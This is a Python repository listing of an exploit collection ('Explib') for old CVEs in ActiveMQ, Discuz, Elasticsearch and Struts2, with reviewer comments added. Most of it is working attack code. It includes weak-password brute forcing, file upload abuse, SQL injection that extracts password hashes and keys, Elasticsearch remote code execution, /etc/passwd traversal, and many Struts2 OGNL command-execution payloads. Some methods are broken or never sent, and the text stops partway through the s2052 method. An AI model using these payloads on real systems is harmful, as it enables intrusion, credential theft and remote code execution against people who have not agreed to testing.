# Repository listing as shown on this page:
# ├── README.md
# ├── activeMQ.py
# ├── discuz.py
# ├── elasticsearch.py
# ├── struts2.py
# └── weblogic.py
#
# /README.md:
#   # Explib
#   Explib: Collections of poc and exp.
#
# NOTE(review): every module below is a proof-of-concept for an old, publicly
# documented CVE and sends live requests to the target as soon as a method is
# called; nothing here asks for confirmation or scopes the target. Run only
# against systems you are authorised to test.

# ---------------------------------------------------------------------------
# /activeMQ.py
# ---------------------------------------------------------------------------
# !/usr/bin/env python
# NOTE(review): the space after "#" makes the line above an ordinary comment,
# not a shebang; the file is not directly executable as intended.
# coding : utf-8
# Date : 2018-04-03 11:53:46
# Author : b4zinga
# Email : b4zinga@outlook.com
# Function: ActiveMQ vuln

import base64
import requests


class ActiveMQ:
    """Checks for an Apache ActiveMQ host.

    All methods talk to the Jetty admin/fileserver on port 8161. The URL is
    stored on ``self.url`` and is (see ``weakPassword``) mutated in place.
    """

    def __init__(self, url: str):
        # Default to http:// when no scheme is given; trailing (and leading)
        # slashes are stripped so paths can be appended with a fixed prefix.
        if '://' not in url:
            url = 'http://' + url
        self.url = url.strip('/')

    def weakPassword(self) -> bool:
        """ActiveMQ weak password check against the /admin/ console.

        Tries every user/password pair from the ``weak`` list (full cross
        product, 64 requests) with HTTP Basic auth.

        Returns:
            True on the first pair that does not yield an "Unauthorized" body,
            False if all pairs were rejected.
        """
        weak = ['admin','s3cret','password','p@ssw0rd','1qaz2wsx', 'root', 'activemq', 'ActiveMQ']

        # NOTE(review): this rewrites self.url to end in ".../admin/". Any
        # later call to putFile()/moveFile() on the same instance then appends
        # ":8161/fileserver/..." to the already-suffixed URL and targets a
        # wrong path. Build the console URL into a local variable instead.
        if ':8161' in self.url:
            self.url += '/admin/'
        else:
            self.url += ':8161/admin/'

        for user in weak:
            for pwd in weak:
                data = {'Authorization':'Basic '+base64.b64encode((user+':'+pwd).encode()).decode()}
                req = requests.get(self.url, headers=data)

                # NOTE(review): success is inferred only from the absence of the
                # word "Unauthorized" in the body, so a 404/5xx or any page that
                # happens not to contain it is reported as a valid login.
                # Checking req.status_code == 401 as well would avoid that.
                if not "Unauthorized" in req.text:
                    print('[+] ActiveMQ weak password!\t'+self.url+'\tusername:{}, pwd:{}'.format(user, pwd))
                    return True
        return False

    def putFile(self, user: str = 'admin', pwd: str = 'admin') -> None:
        """CVE-2016-3088 arbitrary file upload.

        PUTs a placeholder body to /fileserver/test.txt with Basic auth and
        reports success on HTTP 204. Note that ``moveFile`` below moves
        ``shell.txt``, not ``test.txt``, so put→move does not chain as-is.
        """
        headers = {'Authorization' : 'Basic ' + base64.b64encode((user + ':' + pwd).encode()).decode()}
        data = "shell code"

        req = requests.put(self.url+':8161/fileserver/test.txt', headers=headers, data=data)
        if req.status_code == 204:
            print('[+] ActiveMQ put file success')

    def moveFile(self, user: str = 'admin', pwd: str = 'admin') -> None:
        """Second half of CVE-2016-3088: MOVE an uploaded file out of the
        fileserver webapp via a ``file:`` Destination header.

        The source name (shell.txt) and the destination (/tmp/test.txt) are
        hard-coded; success is an HTTP 204 from the server.
        """
        headers = {
            'Authorization' : 'Basic ' + base64.b64encode((user + ':' + pwd).encode()).decode(),
            'Destination':'file:/tmp/test.txt',
        }
        req = requests.request('MOVE', self.url+':8161/fileserver/shell.txt', headers=headers)
        if req.status_code == 204:
            print('[+] ActiveMQ move file success')

    def deserialization(self) -> None:
        """Version: < Apache ActiveMQ 5.13.0
        ActiveMQ deserialization vulnerability (CVE-2015-5254).
        Not implemented here; the external tooling invocation is kept for reference:
        exp: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
        refer: https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2015-5254
        """
        pass



if __name__ == '__main__':
    amq = ActiveMQ(url = '192.168.1.129')
    # NOTE(review): ActiveMQ defines no pathLeakage() method; this line raises
    # AttributeError. The defined checks are weakPassword(), putFile(),
    # moveFile() and the no-op deserialization().
    amq.pathLeakage()


# ---------------------------------------------------------------------------
# /discuz.py
# ---------------------------------------------------------------------------
# !/usr/bin/env python
# coding : utf-8
# Date : 2018-04-08 16:11:30
# Author : b4zinga
# Email : b4zinga@outlook.com
# Function: Discuz tools

import requests
import re


class Discuz:
    """Error-based SQL injection checks against Discuz! faq.php."""

    def __init__(self, url: str):
        # Same normalisation as the other modules: add http:// if no scheme,
        # strip surrounding slashes.
        if '://' not in url:
            url = 'http://' + url
        self.url = url.strip('/')

    @staticmethod
    def getInfo(text: str) -> str:
        """Pull the injected value out of a MySQL "Duplicate entry '...'" error.

        The payloads below use the classic floor(rand(0)*2) / group-by
        duplicate-key trick, so the extracted data is echoed inside the error
        message. Returns the first match, or the sentinel "Can't found..." when
        the page carried no such error (callers currently slice this sentinel
        as if it were data).
        """
        regex = "Duplicate entry '(.*?)'"
        items = re.findall(regex, text)
        if items:
            return items[0]
        else:
            return "Can't found..."

    def faqSql(self) -> None:
        """Version: <= 7.2
        Discuz! faq.php SQL injection (gids[] array parameter).

        Issues four GETs: MySQL version, the first row of
        username:password:salt from cdb_uc_members, and the 64-byte UC authkey
        from cdb_uc_applications in two pieces (62 + 2 chars, because the
        Duplicate-entry error truncates long keys).

        NOTE(review): "[+] ... vulnerable" is printed before anything is
        checked; the table names use the hard-coded ``cdb_`` prefix, so a site
        with another prefix silently returns the sentinel, which is then
        sliced into the printed uc_key.
        """
        payload_db_version = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23'
        req = requests.get(self.url+payload_db_version)
        print('[+] Discuz faq.php sql vulnerable ~ ')
        print('[+] MySql version: '+self.getInfo(req.text))

        payload_get_user_pwd_salt = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23'
        req = requests.get(self.url+payload_get_user_pwd_salt)
        print('[+] username:password:salt ~ '+self.getInfo(req.text))

        # The authkey is fetched as substr(1,62) and substr(63,64); the leading
        # "<digit>:" from floor(rand(0)*2) and the trailing ":" are sliced off.
        payload_get_key1 = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23'
        payload_get_key2 = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,63,64)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23'

        req1 = requests.get(self.url+payload_get_key1)
        req2 = requests.get(self.url+payload_get_key2)

        uck = self.getInfo(req1.text)[2:]+self.getInfo(req2.text)[2:-1]

        print('[+] uc_key: '+uck) # 62 + 2

    def ucKeyGetShell(self) -> None:
        """uc_key getshell"""
        # NOTE(review): the string below is a bare expression statement, not
        # part of the docstring; it is a reference only. Method is a no-op.
        """refer: https://www.waitalone.cn/discuz-uc_key-getshell.html"""
        pass


if __name__ == '__main__':
    dz = Discuz(url='192.168.1.133:81')
    dz.faqSql()


# ---------------------------------------------------------------------------
# /elasticsearch.py
# ---------------------------------------------------------------------------
# !/usr/bin/env python
# coding : utf-8
# Date : 2018-04-08 12:20:24
# Author : b4zinga
# Email : b4zinga@outlook.com
# Function:

import requests
import json


class ElasticSearch:
    """Checks for old (1.x) Elasticsearch script-RCE and traversal bugs.

    Every request goes to port 9200 over plain HTTP with no authentication.
    """

    def __init__(self, url: str):
        if '://' not in url:
            url = 'http://' + url
        self.url = url.strip('/')

    def remoteCodeExec(self) -> None:
        """Version: 1.1.1
        CVE-2014-3120 - dynamic MVEL scripting in script_fields.

        First indexes a throw-away document (the search needs at least one
        hit for script_fields to run), then runs ``whoami`` through the
        scripting engine and prints the captured output.
        """
        # NOTE(review): the body is JSON but is sent as
        # application/x-www-form-urlencoded; ES 1.x accepted this.
        headers = {'Content-Type':'application/x-www-form-urlencoded'}
        req = requests.post(self.url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""") # ES needs at least one document for the search to return a hit, so create one
        # print(req.text) # {"_index":"website","_type":"blog","_id":"gyLnhuVzSBGc9sN1g4v8iQ","_version":1,"created":true}
        data = {
            "size": 1,
            "query": {
                "filtered": {
                    "query": {
                        "match_all": {
                        }
                    }
                }
            },
            "script_fields": {
                "command": {
                    "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
                }
            }
        }

        req = requests.post(self.url+':9200/_search?pretty', headers=headers, data=json.dumps(data))
        if req.status_code == 200:
            print('[+] ElasticSearch Remote Code Exec ~ ')

        # NOTE(review): the original indentation of these two lines could not
        # be recovered from the listing; they are placed at method level. Either
        # way, a non-JSON body or a response without hits/fields raises
        # (ValueError / KeyError / IndexError) instead of reporting "not vulnerable".
        result = json.loads(req.text)
        print(result['hits']['hits'][0]['fields']['command'])


    def remoteCodeExec2(self) -> None:
        """Version: 1.4.2
        CVE-2015-1427 - Groovy sandbox bypass in script_fields.

        Same document-seeding step as remoteCodeExec, then runs ``id`` via
        reflection on java.lang.Runtime and prints the raw response.
        """
        headers = {'Content-Type':'application/x-www-form-urlencoded'}
        req = requests.post(self.url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""") # ES needs at least one document for the search to return a hit, so create one

        data = {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
        req = requests.post(self.url+':9200/_search?pretty', headers=headers, data=json.dumps(data))

        if req.status_code == 200:
            print('[+] ElasticSearch Remote Code Exec2 ~ ')
            print(req.text)

    def dirTraversal(self) -> None:
        """Version: < 1.4.5 or < 1.5.2
        With a "site" plugin installed (here: head), ../ in the plugin path
        walks out of the plugin directory and reads arbitrary files.
        CVE-2015-3337

        NOTE(review): this only works when the ``head`` plugin is present, and
        recent requests/urllib3 versions normalise ".." path segments before
        sending, which would collapse the traversal client-side - verify on
        the wire (curl --path-as-is is the usual alternative).
        """
        req = requests.get(self.url+':9200/_plugin/head/../../../../../../../../../etc/passwd')
        if req.status_code == 200:
            print('[+] ElasticSearch Directory traversal ~ ')
            print(req.text)

    def dirTraversal2(self) -> None:
        """Version: < 1.6.1
        CVE-2015-5531 - snapshot-name path traversal.

        Registers an fs repository at a hard-coded path, registers a second
        repository one level below it, then requests a snapshot whose name
        contains %2f-encoded "../" segments; the file content comes back in
        the HTTP 400 error body, which is why 400 is treated as success.

        NOTE(review): the repository location must be under the server's
        path.repo setting; /usr/share/elasticsearch/repo matches the vulhub
        container, not a generic install.
        """
        data = {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test" # /tmp/test
            }
        }
        req = requests.put(self.url + ':9200/_snapshot/test', data=json.dumps(data))

        if 'true' in req.text and req.status_code == 200:
            print('[+] build backup success ')
            data2 = {
                "type": "fs",
                "settings": {
                    "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
                }
            }
            req2 = requests.put(self.url+':9200/_snapshot/test2', data=json.dumps(data2))
            if 'true' in req2.text and req2.status_code == 200:
                print('[+] build snapshot success ')

                # NOTE(review): nesting of this read was not recoverable from the
                # listing; it is placed inside the second-repository success branch.
                req3 = requests.get(self.url+':9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd')
                if req3.status_code == 400:
                    print('[+] reading /etc/passwd ')
                    print(req3.text)

    def writeWebshell(self) -> None:
        """Not implemented (no-op).
        refer: http://cb.drops.wiki/bugs/wooyun-2015-0110216.html"""
        pass






if __name__ == '__main__':
    es = ElasticSearch(url='192.168.1.129')
    es.remoteCodeExec()
    es.remoteCodeExec2()
    es.dirTraversal()
    es.dirTraversal2()
    # es.writeWebshell()
# ---------------------------------------------------------------------------
# /struts2.py
# ---------------------------------------------------------------------------
# !/usr/bin/env python
# coding : utf-8
# Date : 2018-03-30 11:27:24
# Author : b4zinga
# Email : b4zinga@outlook.com
# Function: struts2 exploit

import requests
from urllib import parse


class Struts2:
    """Collection of Apache Struts 2 OGNL-injection checks (S2-001 .. S2-053).

    Each method targets ``self.url`` as constructed; several methods (s2019,
    s2020, s2032, s2037) only build a payload and never send it, and s2016
    references an undefined name - see the per-method notes.
    """

    def __init__(self, url: str):
        """init"""
        # NOTE(review): unlike the other modules this tests for the substring
        # "http" rather than "://", so a host name containing "http" would not
        # get a scheme prepended.
        if not 'http' in url:
            url = 'http://' + url
        self.url = url.strip('/')

    def s2001(self) -> None:
        """S2-001 remote code execution via %{...} in a form field.

        Only ``payload_exec_cmds`` (username) and ``payload_exec_cmd``
        (password) are posted; the two path-disclosure payloads are built but
        unused. Output is whatever the action page renders.
        """

        # Tomcat working directory (unused)
        payload_getTomcat_exec_path = '%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}'
        # Web root path (unused)
        payload_getWeb_path = """%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}"""
        # Run an arbitrary command (here: pwd)
        payload_exec_cmd = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'
        # Run a command with arguments (argv form: new java.lang.String[]{"cat","/etc/passwd"}):
        payload_exec_cmds = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'

        data = {
            'username': payload_exec_cmds,
            'password': payload_exec_cmd,
        }

        req = requests.post(url=self.url, data=data)
        print(req.text)

    def s2005(self) -> None:
        """version < Struts 2.2.1
        remote code execution
        blind (no output echoed) - the payload only touches /tmp/success
        CVE-2010-1870

        NOTE(review): the hard-coded /example/HelloWorld.action path is
        appended to self.url, and "success" is printed for any non-empty
        response body, so this does not actually confirm execution.
        """
        payload = """/example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1"""

        req = requests.get(url=self.url+payload)
        if req.text:
            print('[+] s2-005 success ')
        else:
            print(req.text)

    def s2007(self) -> None:
        """Version : Struts2 2.0.0 - Struts2 2.2.3
        remote code execution
        The payload goes into a form input (here the ``age`` field, whose
        integer conversion error message echoes the evaluated expression).
        Success is judged by "uid" (from ``id``) appearing in the response.
        """
        payload = """' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '"""
        data = {'age': payload,
                'email': 'asd@qq.com',
                'name': 'asd'}
        req = requests.post(url=self.url, data=data)
        if 'uid' in req.text:
            print('[+] s2-007 success ')
            print(req.text)

    def s2009(self) -> None:
        """Version: 2.1.0 - 2.3.1.1
        remote code execution
        blind (no output echoed) - touches /tmp/success
        CVE-2011-3923

        NOTE(review): ".action" is stripped from self.url before the query
        string is appended; the check `'touch' in req.text` only shows the
        payload was reflected, not that it ran.
        """
        # eg: http://192.168.1.129:8080/ajax/example5.action
        payload = """?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true"""
        req = requests.get(self.url.replace('.action', '') + payload)
        if 'touch' in req.text:
            print('[+] s2-009 success ')
            print(req.text)

    def s2012(self) -> None:
        """Version: 2.1.0 - 2.3.13
        remote code execution
        Posts the %{...} payload in the ``name`` field (cat /etc/passwd) and
        prints the raw response.
        """
        payload = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'

        data = {'name': payload}
        req = requests.post(self.url, data=data)
        print(req.text)

    def s2013(self) -> None:
        """Version: 2.0.0 - 2.3.14.1
        remote code execution
        CVE-2013-1966
        ${...} in the ``a`` query parameter; the output of ``id`` is written
        to the response prefixed with "dbapp=".
        """
        payload = """?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D"""
        req = requests.get(self.url+payload)
        print(req.text)

    def s2014(self) -> None:
        """S2-014: same injection point as S2-013.

        NOTE(review): ``payload`` (a macOS-only "open Calculator.app"
        expression) is assigned and never used; the method simply delegates
        to s2013().
        """
        payload = """link.action?xxxx=%24%7B%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29%29%7D"""
        return self.s2013()

    def s2015(self) -> None:
        """Version: 2.0.0 - 2.3.14.2
        remote code execution
        The OGNL expression is placed in the action *name* (wildcard mapping),
        i.e. the request path is "${...}.action". The response is URL-decoded
        before printing because the expression result is reflected encoded.
        """
        payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27"""
        payload += "id"
        payload += """%27%29.getInputStream%28%29%29%2C%23q%7D.action"""
        req = requests.get(self.url+payload)

        print(parse.unquote(req.text))

    def s2016(self) -> None:
        """Version: 2.0.0 - 2.3.15
        remote code execution
        CVE-2013-2251 - "redirect:" action prefix.

        NOTE(review): ``payload_webshell`` is not defined anywhere in this
        file, so this method raises NameError on every call and neither
        ``payload_exec_cmd`` (uname -a) nor ``payload_get_web_path`` is ever
        sent. The intended call is presumably
        requests.get(self.url+'?redirect:'+parse.quote(payload_exec_cmd)).
        """
        payload_exec_cmd = '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("uname -a").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        payload_get_web_path = """${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}"""

        req = requests.get(self.url+'?redirect:'+parse.quote(payload_webshell))

        print(req.text)

    def s2019(self) -> None:
        """Version: Struts 2.0.0 – Struts 2.3.15.1
        CVE-2013-4316 - DebuggingInterceptor (devMode) ``debug=command``.

        NOTE(review): the payload is only assigned; no request is made and
        nothing is returned. The command slot holds the placeholder
        'aaaaaaaaaaaaaaaaaaa'.
        """
        payload = """debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()"""


    def s2020(self) -> None:
        """Version: 2.0.0 - 2.3.16
        CVE-2014-0094 - ClassLoader manipulation via ``class.classLoader.*``
        parameters (Tomcat 8 access-log-to-JSP technique).

        NOTE(review): the five payloads are only assigned; nothing is sent.
        They would have to be issued in order, one request each.
        """
        # 1-3: repoint the AccessLogValve so its log file lands in the webroot
        payload1 = "?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
        payload2 = "?class.classLoader.resources.context.parent.pipeline.first.prefix=shell"
        payload3 = "?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"

        # 4: changing fileDateFormat makes Tomcat rotate the log; from then on the
        # access log is written to webapps/ROOT/shell1.jsp
        payload4 = "?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1"

        # 5: a request whose query string gets logged, planting JSP into the log file
        payload5 = '/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%>'




    def s2032(self) -> None:
        """Version: 2.3.18 - 2.3.28
        CVE-2016-3081 - ``method:`` prefix (DMI) OGNL injection.

        NOTE(review): payload is only assigned, never sent; ``cmd`` carries
        the placeholder 'aaaaaaaaaaaaaaaaaaa'.
        """
        payload = """?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8"""



    def s2037(self) -> None:
        """Version: 2.3.20 - 2.3.28.1
        CVE-2016-4438 - REST plugin OGNL injection in the action path.

        NOTE(review): two payloads are assigned to the same name (the second,
        devMode ``debug=browser`` variant, overwrites the first) and neither is
        sent.
        """
        payload = """/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa"""

        # dev mode
        payload = """?debug=browser&object=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa"""



    def s2045(self) -> None:
        """Version: 2.3.5 – 2.3.31 , 2.5 – 2.5.10
        remote code execution
        CVE-2017-5638 - OGNL in the Content-Type header (Jakarta multipart
        parser). Runs ``whoami`` (cmd.exe /c or /bin/bash -c depending on
        os.name) and copies its stdout into the response.
        """
        header = dict()
        header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        req = requests.get(self.url, headers=header)

        print(req.text)

    def s2046(self) -> None:
        """Version: 2 2.3.x < 2.3.32, 2.5.x < 2.5.10.1
        CVE-2017-5638 (S2-046 variant: OGNL in the multipart filename).
        Not implemented in Python; the bash/curl reference below is kept as a
        bare string (note: "\\0" and "\\r\\n" inside it are interpreted by
        Python, which is harmless since the string is never used).
        """
        """
        #!/bin/bash

        url=$1
        cmd=$2
        shift
        shift

        boundary="---------------------------735323031399963166993862150"
        content_type="multipart/form-data; boundary=$boundary"
        payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

        printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@
        """
        pass


    def s2048(self) -> None:
        """Version: 2.0.0 - 2.3.32
        remote code execution
        CVE-2017-9791 - Struts 1 plugin, untrusted input used as an
        ActionMessage key. The OGNL goes in the ``name`` field; the other
        fields appear to mirror the showcase "integer" form (assumption).
        """

        payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        data = {
            '__checkbox_bustedBefore': 'true',
            'age': 'ss',
            'description': 'as',
            'name': payload,
        }

        req = requests.post(url=self.url, data=data)
        print(req.text)

    def s2052(self) -> None:
        """Version: 2.1.2-2.3.33, 2.5-2.5.12
        remote code execution
        blind (no output echoed) - touches /tmp/success
        CVE-2017-9805 - REST plugin XStream deserialization.

        NOTE(review): the XML element tags of this payload have been stripped
        in this listing (no "<" survives); what is posted here is plain
